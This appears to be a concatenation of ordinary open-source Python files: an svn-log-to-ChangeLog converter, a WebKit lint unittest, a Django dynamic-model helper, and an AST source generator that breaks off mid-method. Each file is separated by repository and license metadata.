# -A, --no-author generate log without author names
# -H, --no-host generate author name without hostname
#
import sys
import os
import time
import re
import getopt
import string
import codecs
from xml.utils import qp_xml
# Module-level configuration, populated from command-line flags by
# process_opts().
kill_prefix_rx = None          # compiled regex for --prefix; paths not matching are dropped
default_domain = "localhost"   # --domain: email domain for logins missing from the users file
exclude = []                   # --exclude: path prefixes to skip
users = { }                    # --users: login -> "Real Name <email>" map
reloc = { }                    # --relocate: src -> dst path replacements
max_join_delta = 3 * 60        # --delta: merge window (seconds) for same-author commits
list_format = False            # -F: format "- item" bullet lists
strip = False                  # -s: strip /* ... */ comments from messages
date_only = False              # -O: omit time-of-day from entry headers
no_files = False               # -L: omit changed-file lists
no_host = False                # -H: omit @domain from author emails
no_author = False              # -A: omit author names entirely

# Matches the leading "YYYY-MM-DDTHH:MM:SS" part of svn's ISO timestamps.
date_rx = re.compile(r"^(\d+-\d+-\d+T\d+:\d+:\d+)")
def die(msg):
    """Write *msg* to stderr and abort the program with exit status 1."""
    sys.stderr.write("%s\n" % msg)
    sys.exit(1)
def attr(e, n):
    """Return the value of the un-namespaced attribute *n* of qp_xml element *e*."""
    key = ("", n)
    return e.attrs[key]
def has_child(e, n):
    """Return 1 when element *e* has a direct child named *n*, else 0."""
    if any(child_node.name == n for child_node in e.children):
        return 1
    return 0
def child(e, n):
    """Return the first direct child of *e* named *n*; abort via die() when absent."""
    for node in e.children:
        if node.name == n:
            return node
    die("<%s> doesn't have <%s> child" % (e.name, n))
def convert_path(n):
    """Relocate, prefix-strip and filter repository path *n*.

    Returns the cleaned path, or None when the path lies outside the
    configured prefix or starts with an excluded directory.
    """
    # Apply --relocate X=Y substitutions first.
    for src, target in reloc.items():
        n = n.replace(src, target)
    # Paths that do not match the --prefix regex are outside the project.
    if kill_prefix_rx is not None:
        if not kill_prefix_rx.search(n):
            return None
        n = kill_prefix_rx.sub("", n)
    # Drop a single leading slash; an empty result means the root itself.
    if n.startswith("/"):
        n = n[1:]
    if n == "":
        n = "/"
    if any(n.startswith(pref) for pref in exclude):
        return None
    return n
def convert_user(u):
    # Map an svn login to the "Name <email>:" string used in entry headers.
    # Returns '' when -A/--no-author was given.
    if no_author == False:
        if users.has_key(u):
            # Known login: use the real name/email from the --users file.
            return users[u]
        else:
            if no_host:
                return u + ":"
            else:
                # Synthesize login <login@domain>: from the default domain.
                return "%s <%s@%s>:" % (u, u, default_domain)
    else:
        return ''
def wrap_text_line(str, pref, width, start):
    """Greedy word-wrap of *str* to *width* columns.

    The first emitted line is not prefixed (it continues an existing line
    that already occupies *start* columns); every following line is
    prefixed with *pref*.
    """
    pieces = []
    current = u""
    on_first_line = True
    for word in str.split():
        if not current:
            current = word
            continue
        # Would appending this word overflow the remaining width?
        if len(current) + 1 + len(word) > width - start:
            if on_first_line:
                pieces.append(current + u"\n")
                on_first_line = False
                start = 0
            else:
                pieces.append(pref + current + u"\n")
            current = word
        else:
            current = current + u" " + word
    if on_first_line:
        pieces.append(current)
    else:
        pieces.append(pref + current)
    return u"".join(pieces)
def wrap_text(str, pref, width, start = 0):
    # Wrap *str*; with --list-format, "- item" bullets are wrapped
    # individually so each bullet starts on its own prefixed line.
    if not list_format:
        return wrap_text_line(str,pref,width,start)
    else:
        # Split the message on "- " bullet markers.
        items = re.split(r"\-\s+",str)
        ret = wrap_text_line(items[0],pref,width,start)
        for item in items[1:]:
            ret += pref + u"- " + wrap_text_line(item,pref+"  ",width,start)
        return ret
class Entry:
    """One ChangeLog entry: a commit (or several merged commits) by a
    single author within the --delta time window."""

    def __init__(self, tm, rev, author, msg):
        self.tm = tm            # timestamp of the newest merged commit
        self.rev = rev          # revision of the newest merged commit
        self.author = author
        self.msg = msg
        self.beg_tm = tm        # timestamp of the oldest merged commit
        self.beg_rev = rev      # revision of the oldest merged commit

    def join(self, other):
        """Absorb *other* (a later commit by the same author) into this entry."""
        self.tm = other.tm
        self.rev = other.rev
        self.msg += other.msg

    def dump(self, out):
        """Write the formatted entry to *out*; entries with empty messages
        are suppressed entirely."""
        if len(self.msg) > 0:
            if date_only == False:
                tformat = "%Y-%m-%d %H:%M +0000"
            else:
                tformat = "%Y-%m-%d"
            # Merged entries show a revision range, single ones a lone rev.
            if self.rev != self.beg_rev:
                out.write("%s [r%s-%s] %s\n\n" % \
                          (time.strftime(tformat, time.localtime(self.beg_tm)), \
                           self.rev, self.beg_rev, convert_user(self.author)))
            else:
                out.write("%s [r%s] %s\n\n" % \
                          (time.strftime(tformat, time.localtime(self.beg_tm)), \
                           self.rev, convert_user(self.author)))
            out.write(self.msg)

    def can_join(self, other):
        """True when *other* is close enough in time (same author) to merge."""
        return self.author == other.author and abs(self.tm - other.tm) < max_join_delta
def process_entry(e):
    """Convert one <logentry> element into an Entry, or None when the
    commit has no message or touches no paths of interest."""
    rev = attr(e, "revision")
    if has_child(e, "author"):
        author = child(e, "author").textof()
    else:
        author = "anonymous"
    m = date_rx.search(child(e, "date").textof())
    msg = ' ' + child(e, "msg").textof()
    # -s/--strip-comments: cut the first /* ... */ span from the message.
    if strip == True:
        ibegin = string.find(msg, "/*")
        if ibegin > 0:
            iend = string.find(msg, "*/") + 2
            msg = msg[0:ibegin] + msg[iend:]
    if m:
        tm = time.mktime(time.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S"))
    else:
        die("evil date: %s" % child(e, "date").textof())
    paths = []
    # msg always starts with a space, so len > 1 means a non-empty message.
    if len(msg) > 1:
        for path in child(e, "paths").children:
            if path.name != "path": die("<paths> has non-<path> child")
            nam = convert_path(path.textof())
            if nam != None:
                if attr(path, "action") == "D":
                    paths.append(nam + " (removed)")
                elif attr(path, "action") == "A":
                    paths.append(nam + " (added)")
                else:
                    paths.append(nam)

    if paths != [] and no_files == False:
        pathlines = wrap_text(", ".join(paths), "\t* ", 65)
        # Continue the message right after the last path line.
        start = len(pathlines) - pathlines.rfind("\n") + 1
        message = wrap_text(": " + msg, "\t  ", 65, start )
        return Entry(tm, rev, author, "\t* %s %s\n\n" % (pathlines, message))
    elif paths != [] and no_files == True:
        return Entry(tm, rev, author, "\t* %s\n\n" % wrap_text(msg, "\t  ", 65))

    return None
def process(fin, fout):
    """Parse the svn XML log on *fin* and write a ChangeLog to *fout*,
    merging adjacent same-author commits (see Entry.can_join)."""
    parser = qp_xml.Parser()
    root = parser.parse(fin)

    if root.name != "log": die("root is not <log>")

    cur = None
    for logentry in root.children:
        if logentry.name != "logentry": die("non <logentry> <log> child")
        e = process_entry(logentry)
        if e != None:
            if cur != None:
                if cur.can_join(e):
                    cur.join(e)
                else:
                    # Flush the finished entry and start collecting a new one.
                    cur.dump(fout)
                    cur = e
            else: cur = e
    # Flush the trailing entry, if any.
    if cur != None: cur.dump(fout)
def usage():
    """Print command-line help to stderr."""
    sys.stderr.write(\
"""Usage: %s [OPTIONS] [FILE]
Convert specified subversion xml logfile to GNU-style ChangeLog.

Options:
  -p, --prefix=REGEXP  set root directory of project (it will be striped off
                       from ChangeLog entries, paths outside it will be
                       ignored)
  -x, --exclude=DIR    exclude DIR from ChangeLog (relative to prefix)
  -o, --output         set output file (defaults to 'ChangeLog')
  -d, --domain=DOMAIN  set default domain for logins not listed in users file
  -u, --users=FILE     read logins from specified file
  -F, --list-format    format commit logs with enumerated change list (items
                       prefixed by '- ')
  -r, --relocate=X=Y   before doing any other operations on paths, replace
                       X with Y (useful for directory moves)
  -D, --delta=SECS     when log entries differ by less then SECS seconds and
                       have the same author -- they are merged, it defaults
                       to 180 seconds
  -h, --help           print this information
  -s, --strip-comments strip /* ... */ comments in log
  -O, --only-date      generate only dates (without time)
  -L, --no-files       generate log without filenames
  -A, --no-author      generate log without author names
  -H, --no-host        generate author name without hostname

Users file is used to map svn logins to real names to appear in ChangeLog.
If login is not found in users file "login <login@domain>" is used.

Example users file:
john John X. Foo <jfoo@example.org>
mark Marcus Blah <mb@example.org>

Typical usage of this script is something like this:

  svn log -v --xml | %s -p '/foo/(branches/[^/]+|trunk)' -u aux/users

Please send bug reports and comments to author:
Michal Moskal <malekith@pld-linux.org>

Regarding -s, -O, -L, -A, -H options see
http://www.core.com.pl/svn2log
""" % (sys.argv[0], sys.argv[0]))
def utf_open(name, mode):
    """Open file *name* as UTF-8 text, replacing undecodable bytes."""
    return codecs.open(name, mode, "utf-8", "replace")
def process_opts():
    """Parse command-line options into the module-level configuration
    globals, then run the conversion."""
    # NOTE(review): the short-option string lists "d:" twice
    # ("o:u:p:x:d:r:d:D:FhsOLHA") — harmless but presumably a typo.
    try:
        opts, args = getopt.gnu_getopt(sys.argv[1:], "o:u:p:x:d:r:d:D:FhsOLHA",
                                       ["users=", "prefix=", "domain=", "delta=",
                                        "exclude=", "help", "output=", "relocate=",
                                        "list-format","strip-comments", "only-date", "no-files",
                                        "no-host", "no-author"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)

    fin = sys.stdin
    fout = None

    global kill_prefix_rx, exclude, users, default_domain, reloc, max_join_delta, list_format, strip, date_only, no_files, no_host, no_author

    for o, a in opts:
        if o in ("--prefix", "-p"):
            # Anchor the prefix at the beginning of the path.
            kill_prefix_rx = re.compile("^" + a)
        elif o in ("--exclude", "-x"):
            exclude.append(a)
        elif o in ("--help", "-h"):
            usage()
            sys.exit(0)
        elif o in ("--output", "-o"):
            fout = utf_open(a, "w")
        elif o in ("--domain", "-d"):
            default_domain = a
        elif o in ("--strip-comments", "-s"):
            strip = True
        elif o in ("--only-date", "-O"):
            date_only = True
        elif o in ("--no-files", "-L"):
            no_files = True
        elif o in ("--no-host", "-H"):
            no_host = True
        elif o in ("--no-author", "-A"):
            no_author = True
        elif o in ("--users", "-u"):
            # Users file: "login Real Name <email>" per line, '#' comments.
            f = utf_open(a, "r")
            for line in f.xreadlines():
                w = line.split()
                if len(line) < 1 or line[0] == '#' or len(w) < 2:
                    continue
                users[w[0]] = " ".join(w[1:])
        elif o in ("--relocate", "-r"):
            (src, target) = a.split("=")
            reloc[src] = target
        elif o in ("--delta", "-D"):
            max_join_delta = int(a)
        elif o in ("--list-format", "-F"):
            list_format = True
        else:
            usage()
            sys.exit(2)

    # At most one positional argument: the XML log file (default: stdin).
    if len(args) > 1:
        usage()
        sys.exit(2)

    if len(args) == 1:
        fin = open(args[0], "r")

    if fout == None:
        fout = utf_open("ChangeLog", "w")

    process(fin, fout)
if __name__ == "__main__":
    # svn timestamps are UTC; force the process timezone to match so
    # time.localtime() in Entry.dump() prints UTC times.
    os.environ['TZ'] = 'UTC'
    try:
        time.tzset()
    except AttributeError:
        # time.tzset() is unavailable on some platforms (e.g. Windows).
        pass
    process_opts()
| gpl-2.0 |
joomel1/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/layout_tests/lint_test_expectations_unittest.py | 122 | 6074 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import optparse
import StringIO
import unittest2 as unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.layout_tests import lint_test_expectations
class FakePort(object):
    """Minimal stand-in for a Port used by the lint tests.

    Records on the shared host which ports had their expectations parsed,
    and serves a single-entry expectations dict.
    """

    def __init__(self, host, name, path):
        self.host = host
        self.name = name
        self.path = path

    def test_configuration(self):
        return None

    def expectations_dict(self):
        # Side effect checked by the tests: note that this port was parsed.
        self.host.ports_parsed.append(self.name)
        return {self.path: ''}

    def skipped_layout_tests(self, _):
        return set()

    def all_test_configurations(self):
        return []

    def configuration_specifier_macros(self):
        return []

    def get_option(self, _, val):
        return val

    def path_to_generic_test_expectations_file(self):
        return ''
class FakeFactory(object):
    """Stand-in for a PortFactory serving a fixed collection of ports."""

    def __init__(self, host, ports):
        self.host = host
        # Index the supplied ports by name for lookup in get().
        self.ports = dict((port.name, port) for port in ports)

    def get(self, port_name, *args, **kwargs):  # pylint: disable=W0613,E0202
        return self.ports[port_name]

    def all_port_names(self, platform=None):  # pylint: disable=W0613,E0202
        return sorted(self.ports)
class LintTest(unittest.TestCase):
    """Tests for lint_test_expectations.lint() itself."""

    def test_all_configurations(self):
        # With no platform given, lint() must parse expectations for every
        # known port exactly once, in name order.
        host = MockHost()
        host.ports_parsed = []
        host.port_factory = FakeFactory(host, (FakePort(host, 'a', 'path-to-a'),
                                               FakePort(host, 'b', 'path-to-b'),
                                               FakePort(host, 'b-win', 'path-to-b')))

        logging_stream = StringIO.StringIO()
        options = optparse.Values({'platform': None})
        res = lint_test_expectations.lint(host, options, logging_stream)

        self.assertEqual(res, 0)
        self.assertEqual(host.ports_parsed, ['a', 'b', 'b-win'])

    def test_lint_test_files(self):
        # Valid expectations for a single platform lint cleanly.
        logging_stream = StringIO.StringIO()
        options = optparse.Values({'platform': 'test-mac-leopard'})
        host = MockHost()

        # pylint appears to complain incorrectly about the method overrides pylint: disable=E0202,C0322
        # FIXME: incorrect complaints about spacing pylint: disable=C0322
        host.port_factory.all_port_names = lambda platform=None: [platform]

        res = lint_test_expectations.lint(host, options, logging_stream)

        self.assertEqual(res, 0)
        self.assertIn('Lint succeeded', logging_stream.getvalue())

    def test_lint_test_files__errors(self):
        # Broken expectations must produce a failure exit code and per-file
        # error locations in the log output.
        options = optparse.Values({'platform': 'test', 'debug_rwt_logging': False})
        host = MockHost()

        # FIXME: incorrect complaints about spacing pylint: disable=C0322
        port = host.port_factory.get(options.platform, options=options)
        port.expectations_dict = lambda: {'foo': '-- syntax error1', 'bar': '-- syntax error2'}

        host.port_factory.get = lambda platform, options=None: port
        host.port_factory.all_port_names = lambda platform=None: [port.name()]

        logging_stream = StringIO.StringIO()
        res = lint_test_expectations.lint(host, options, logging_stream)

        self.assertEqual(res, -1)
        self.assertIn('Lint failed', logging_stream.getvalue())
        self.assertIn('foo:1', logging_stream.getvalue())
        self.assertIn('bar:1', logging_stream.getvalue())
class MainTest(unittest.TestCase):
    """Checks the exit codes main() maps lint() outcomes to."""

    def test_success(self):
        saved_lint = lint_test_expectations.lint

        # unused args pylint: disable=W0613
        def interrupting_lint(host, options, logging_stream):
            raise KeyboardInterrupt

        def successful_lint(host, options, logging_stream):
            return 0

        def exception_raising_lint(host, options, logging_stream):
            assert False

        out = StringIO.StringIO()
        err = StringIO.StringIO()
        try:
            lint_test_expectations.lint = interrupting_lint
            self.assertEqual(lint_test_expectations.main([], out, err),
                             lint_test_expectations.INTERRUPTED_EXIT_STATUS)
            lint_test_expectations.lint = successful_lint
            self.assertEqual(
                lint_test_expectations.main(['--platform', 'test'], out, err), 0)
            lint_test_expectations.lint = exception_raising_lint
            self.assertEqual(lint_test_expectations.main([], out, err),
                             lint_test_expectations.EXCEPTIONAL_EXIT_STATUS)
        finally:
            # Always restore the real lint() so other tests are unaffected.
            lint_test_expectations.lint = saved_lint
| bsd-3-clause |
hrpt-se/hrpt | apps/pollster/dynamicmodels.py | 1 | 2803 | # taken from https://code.djangoproject.com/wiki/DynamicModels and http://www.agmweb.ca/blog/andy/2249/
from django import forms
from django.db import models, connection
from django.apps import apps as cache
from django.core.management import color
from django.contrib import admin
"""
This module is cancer. This is a contradition on itself.
The motivation to this kind of code is the reason _NOT_ to do it.
From the links above:
"The advantages of not having to declare a model in Python source should become clear shortly."
... except that they never do, only the problems of doing this do. Though they were already
crystal clear to any season programmer.
Waste of anyone's time. Kill with fire!
"""
def create(name, fields=None, app_label='', module='', options=None, admin_opts=None):
    """
    Create specified model

    Dynamically builds an unmanaged Django model class.

    :param name: class name for the new model.
    :param fields: mapping of attribute name -> Field instance (merged into
        the class body as-is).
    :param app_label: Django app label set on the inner Meta class.
    :param module: value for the generated class's ``__module__``.
    :param options: extra Meta options as a mapping.
    :param admin_opts: if not None, a ModelAdmin subclass is built and the
        model is registered with the admin site.
    :return: the newly created model class.
    """
    class Meta:
        # Using type('Meta', ...) gives a dictproxy error during model creation
        managed = False  # keep Django's migration machinery away from this table
        pass
    if app_label:
        # app_label must be set using the Meta inner class
        setattr(Meta, 'app_label', app_label)
    # Update Meta with any options that were provided
    if options is not None:
        for key, value in options.items():
            setattr(Meta, key, value)
    # Set up a dictionary to simulate declarations within a class
    attrs = {'__module__': module, 'Meta': Meta}
    # Add in any fields that were provided
    if fields:
        attrs.update(fields)
    # Create the class, which automatically triggers ModelBase processing
    model = type(name, (models.Model,), attrs)
    # Ensure that the dynamic class is not cached
    cache.all_models[app_label].pop(model._meta.object_name, None)
    # Create an Admin class if admin options were provided
    if admin_opts is not None:
        class Admin(admin.ModelAdmin):
            pass
        # NOTE(review): this iterates admin_opts directly and unpacks pairs —
        # it expects an iterable of (key, value) tuples, unlike `options`
        # above which is a mapping. A plain dict here would raise; confirm
        # what callers actually pass.
        for key, value in admin_opts:
            setattr(Admin, key, value)
        admin.site.register(model, Admin)
    return model
def install(model):
    """Create *model*'s database table directly via the schema editor.

    Standard syncdb/migrations expect models declared in app modules, so
    dynamic models bypass them entirely. The upside: a single model can be
    installed without the surrounding project structure. The downside:
    relationships and indexes must be handled manually — only the basic
    table definition is created here.
    """
    with connection.schema_editor() as editor:
        editor.create_model(model)
def to_form(model, fields=None):
    """Build and return a ModelForm subclass bound to *model*.

    All model fields are exposed by default; *fields* (a mapping) may add
    extra class attributes / form-field overrides.
    """
    class Meta:
        pass
    setattr(Meta, 'model', model)
    setattr(Meta, 'fields', '__all__')
    form_attrs = {'Meta': Meta}
    if fields:
        form_attrs.update(fields)
    return type('modelform', (forms.ModelForm,), form_attrs)
| agpl-3.0 |
RayMick/SFrame | oss_src/unity/python/sframe/meta/asttools/visitors/pysourcegen.py | 15 | 23969 | '''
Created on Jul 15, 2011
@author: sean
'''
from __future__ import print_function
import _ast
from ...asttools import Visitor
from string import Formatter
import sys
from ...utils import py3op, py2op
if sys.version_info.major < 3:
from StringIO import StringIO
else:
from io import StringIO
class ASTFormatter(Formatter):
    """string.Formatter that understands the custom ``{x:node}`` spec.

    A field formatted with ``:node`` is rendered to python source text via
    ExprSourceGen instead of str()/format().
    """

    def format_field(self, value, format_spec):
        """Render *value* as source when spec is 'node'; defer otherwise."""
        if format_spec == 'node':
            gen = ExprSourceGen()
            gen.visit(value)
            return gen.dumps()
        elif value == '':
            # Empty-string sentinel passes straight through untouched.
            return value
        else:
            return super(ASTFormatter, self).format_field(value, format_spec)

    def get_value(self, key, args, kwargs):
        """Resolve a replacement-field key.

        '' -> first positional arg; keyword keys -> kwargs; int keys ->
        positional args; numeric strings fall back to positional indexing.
        (The original ended with an unreachable ``raise Exception`` after a
        ``return`` — dead code, removed.)
        """
        if key == '':
            return args[0]
        elif key in kwargs:
            return kwargs[key]
        elif isinstance(key, int):
            return args[key]
        # Numeric string key (e.g. '1') indexes the positional args.
        return args[int(key)]
def str_node(node):
    """Render a single AST *node* to python source text and return it."""
    generator = ExprSourceGen()
    generator.visit(node)
    return generator.dumps()
def simple_string(value):
    """Build a visitor method that always emits the fixed template *value*.

    The node's attributes are forwarded as format kwargs, so templates like
    ``'yield {value:node}'`` can still reference node fields.
    """
    def visitNode(self, node):
        self.print(value, **node.__dict__)

    return visitNode
class ExprSourceGen(Visitor):
    """AST visitor that renders python *expression* nodes back to source.

    Each ``visitXxx`` method writes the textual form of the matching ``_ast``
    node into ``self.out`` through ``self.print``, which runs the line
    through ASTFormatter (so ``{x:node}`` recursively renders sub-nodes).
    Indentation is tracked in ``self.level``; the ``indenter``/``no_indent``
    context managers adjust it.
    """

    def __init__(self):
        self.out = StringIO()          # accumulated source text
        self.formatter = ASTFormatter()
        self.indent = ' '              # one indent level == one space
        self.level = 0                 # current indent depth

    @property
    def indenter(self):
        # Context manager: emit a newline and indent one level deeper.
        return Indenter(self)

    @property
    def no_indent(self):
        # Context manager: temporarily suppress all indentation.
        return NoIndent(self)

    def dump(self, file=sys.stdout):
        """Write everything generated so far to *file*."""
        self.out.seek(0)
        print(self.out.read(), file=file)

    def dumps(self):
        """Return everything generated so far as a string."""
        self.out.seek(0)
        value = self.out.read()
        return value

    def print(self, line, *args, **kwargs):
        # Format *line* via ASTFormatter, then emit it prefixed by the
        # current indentation (or an explicit ``level=`` override).
        line = self.formatter.format(line, *args, **kwargs)
        level = kwargs.get('level')
        prx = self.indent * (level if level else self.level)
        print(prx, line, sep='', end='', file=self.out)

    def print_lines(self, lines,):
        # Emit each line at the current indent, newline-terminated.
        prx = self.indent * self.level
        for line in lines:
            print(prx, line, sep='', file=self.out)

    def visitName(self, node):
        self.print(node.id)

    @py2op
    def visitarguments(self, node):
        # ('args', 'vararg', 'kwarg', 'defaults')
        # Left-pad defaults with None so they line up with args.
        defaults = [None] * (len(node.args) - len(node.defaults))
        defaults.extend(node.defaults)
        i = 0
        args = list(node.args)
        if args:
            i += 1
            arg = args.pop(0)
            default = defaults.pop(0)
            self.visit(arg)
            if default is not None:
                self.print('={:node}', default)
        while args:
            arg = args.pop(0)
            default = defaults.pop(0)
            self.print(', ')
            self.visit(arg)
            if default is not None:
                self.print('={:node}', default)
        if node.vararg:
            self.print('{0}*{1}', ', ' if i else '', node.vararg)
        if node.kwarg:
            self.print('{0}**{1}', ', ' if i else '', node.kwarg)

    @visitarguments.py3op
    def visitarguments(self, node):
        # ('args', 'vararg', 'kwarg', 'defaults')
        defaults = [None] * (len(node.args) - len(node.defaults))
        defaults.extend(node.defaults)
        i = 0
        args = list(node.args)
        if args:
            i += 1
            arg = args.pop(0)
            default = defaults.pop(0)
            self.visit(arg)
            if default is not None:
                self.print('={:node}', default)
        while args:
            arg = args.pop(0)
            default = defaults.pop(0)
            self.print(', ')
            self.visit(arg)
            if default is not None:
                self.print('={:node}', default)
        if node.vararg:
            self.print('{0}*{1}', ', ' if i else '', node.vararg)
            if node.varargannotation:
                self.print(':{:node}', node.varargannotation)
        elif node.kwonlyargs:
            # Bare '*' separator when there are kw-only args but no *vararg.
            self.print('{0}*', ', ' if i else '')
        kwonlyargs = list(node.kwonlyargs)
        if kwonlyargs:
            i += 1
            kw_defaults = [None] * (len(kwonlyargs) - len(node.kw_defaults))
            kw_defaults.extend(node.kw_defaults)
            while kwonlyargs:
                kw_arg = kwonlyargs.pop(0)
                kw_default = kw_defaults.pop(0)
                self.print(', ')
                self.visit(kw_arg)
                if kw_default is not None:
                    self.print('={:node}', kw_default)
        if node.kwarg:
            self.print('{0}**{1}', ', ' if i else '', node.kwarg)
            # NOTE(review): this guards on ``varargannotation`` but prints
            # ``kwargannotation`` — it looks like the test should be
            # ``node.kwargannotation``; confirm against upstream `meta`.
            if node.varargannotation:
                self.print(':{:node}', node.kwargannotation)

    def visitNum(self, node):
        self.print(repr(node.n))

    def visitBinOp(self, node):
        self.print('({left:node} {op:node} {right:node})', left=node.left, op=node.op, right=node.right)

    def visitAdd(self, node):
        self.print('+')

    def visitalias(self, node):
        # import alias: plain name or "name as asname".
        if node.asname is None:
            self.print("{0}", node.name)
        else:
            self.print("{0} as {1}", node.name, node.asname)

    def visitCall(self, node):
        self.print('{func:node}(', func=node.func)
        i = 0
        # Emit ", " before every argument except the first.
        print_comma = lambda i: self.print(", ") if i > 0 else None
        with self.no_indent:
            for arg in node.args:
                print_comma(i)
                self.print('{:node}', arg)
                i += 1
            for kw in node.keywords:
                print_comma(i)
                self.print('{:node}', kw)
                i += 1
            if node.starargs:
                print_comma(i)
                self.print('*{:node}', node.starargs)
                i += 1
            if node.kwargs:
                print_comma(i)
                self.print('**{:node}', node.kwargs)
                i += 1
            self.print(')')

    def visitkeyword(self, node):
        self.print("{0}={1:node}", node.arg, node.value)

    def visitStr(self, node):
        self.print(repr(node.s))

    # NOTE(review): this def is shadowed by the ``visitMod = simple_string('%')``
    # assignment further down the class body; both emit '%', so it is harmless.
    def visitMod(self, node):
        self.print('%')

    def visitTuple(self, node, brace='()'):
        self.print(brace[0])
        print_comma = lambda i: self.print(", ") if i > 0 else None
        i = 0
        with self.no_indent:
            for elt in node.elts:
                print_comma(i)
                self.print('{:node}', elt)
                i += 1
            if len(node.elts) == 1:
                # Single-element tuple needs the trailing comma: (x,)
                self.print(',')
            self.print(brace[1])

    def visitCompare(self, node):
        self.print('({0:node} ', node.left)
        with self.no_indent:
            for (op, right) in zip(node.ops, node.comparators):
                self.print('{0:node} {1:node}', op, right)
            self.print(')')

    @py2op
    def visitRaise(self, node):
        # py2: raise type, inst, tback
        self.print('raise ')
        with self.no_indent:
            if node.type:
                self.print('{:node}', node.type)
            if node.inst:
                self.print(', {:node}', node.inst)
            if node.tback:
                self.print(', {:node}', node.tback)

    @visitRaise.py3op
    def visitRaise(self, node):
        # py3: raise exc from cause
        self.print('raise ')
        with self.no_indent:
            if node.exc:
                self.print('{:node}', node.exc)
            if node.cause:
                self.print(' from {:node}', node.cause)

    def visitAttribute(self, node):
        self.print('{:node}.{attr}', node.value, attr=node.attr)

    def visitDict(self, node):
        # '{{' / '}}' are literal braces after formatting.
        self.print('{{')
        items = zip(node.keys, node.values)
        with self.no_indent:
            i = 0
            pc = lambda : self.print(", ") if i > 0 else None
            for key, value in items:
                pc()
                self.print('{0:node}:{1:node}', key, value)
                i += 1
            self.print('}}')

    def visitSet(self, node):
        self.print('{{')
        items = node.elts
        with self.no_indent:
            i = 0
            pc = lambda : self.print(", ") if i > 0 else None
            for value in items:
                pc()
                self.print('{0:node}', value)
                i += 1
            self.print('}}')

    def visitList(self, node):
        self.print('[')
        with self.no_indent:
            i = 0
            pc = lambda : self.print(", ") if i > 0 else None
            for item in node.elts:
                pc()
                self.print('{:node}', item)
                i += 1
            self.print(']')

    def visitSubscript(self, node):
        self.print('{0:node}[{1:node}]', node.value, node.slice)

    def visitIndex(self, node):
        if isinstance(node.value, _ast.Tuple):
            # Tuple index prints without parens: x[a, b]
            with self.no_indent:
                self.visit(node.value, brace=['', ''])
        else:
            self.print('{:node}', node.value)

    def visitSlice(self, node):
        with self.no_indent:
            if node.lower is not None:
                self.print('{:node}', node.lower)
            self.print(':')
            if node.upper is not None:
                self.print('{:node}', node.upper)
            if node.step is not None:
                self.print(':')
                self.print('{:node}', node.step)

    def visitExtSlice(self, node):
        dims = list(node.dims)
        with self.no_indent:
            dim = dims.pop(0)
            self.print('{0:node}', dim)
            while dims:
                dim = dims.pop(0)
                self.print(', {0:node}', dim)

    def visitUnaryOp(self, node):
        self.print('({0:node}{1:node})', node.op, node.operand)

    def visitAssert(self, node):
        self.print('assert {0:node}', node.test)
        if node.msg:
            with self.no_indent:
                self.print(', {0:node}', node.msg)

    # Fixed-text operator/keyword visitors.
    visitUSub = simple_string('-')
    visitUAdd = simple_string('+')
    visitNot = simple_string('not ')
    visitInvert = simple_string('~')
    visitAnd = simple_string('and')
    visitOr = simple_string('or')
    visitSub = simple_string('-')
    visitFloorDiv = simple_string('//')
    visitDiv = simple_string('/')
    visitMod = simple_string('%')
    visitMult = simple_string('*')
    visitPow = simple_string('**')
    visitEq = simple_string('==')
    visitNotEq = simple_string('!=')
    visitLt = simple_string('<')
    visitGt = simple_string('>')
    visitLtE = simple_string('<=')
    visitGtE = simple_string('>=')
    visitLShift = simple_string('<<')
    visitRShift = simple_string('>>')
    visitIn = simple_string('in')
    visitNotIn = simple_string('not in')
    visitIs = simple_string('is')
    visitIsNot = simple_string('is not')
    visitBitAnd = simple_string('&')
    visitBitOr = simple_string('|')
    visitBitXor = simple_string('^')
    visitEllipsis = simple_string('...')
    visitYield = simple_string('yield {value:node}')

    def visitBoolOp(self, node):
        # NOTE(review): with 3+ operands this prints one '(' but a ')' per
        # remaining operand, e.g. "(a and b) and c)" — parens look
        # unbalanced; confirm against upstream `meta`.
        with self.no_indent:
            values = list(node.values)
            left = values.pop(0)
            self.print('({:node} ', left)
            while values:
                left = values.pop(0)
                self.print('{0:node} {1:node})', node.op, left)

    def visitIfExp(self, node):
        self.print('{body:node} if {test:node} else {orelse:node}', **node.__dict__)

    def visitLambda(self, node):
        self.print('lambda {0:node}: {1:node}', node.args, node.body)

    def visitListComp(self, node):
        self.print('[{0:node}', node.elt)
        generators = list(node.generators)
        with self.no_indent:
            while generators:
                generator = generators.pop(0)
                self.print('{0:node}', generator)
            self.print(']')

    def visitSetComp(self, node):
        self.print('{{{0:node}', node.elt)
        generators = list(node.generators)
        with self.no_indent:
            while generators:
                generator = generators.pop(0)
                self.print('{0:node}', generator)
            self.print('}}')

    def visitDictComp(self, node):
        self.print('{{{0:node}:{1:node}', node.key, node.value)
        generators = list(node.generators)
        with self.no_indent:
            while generators:
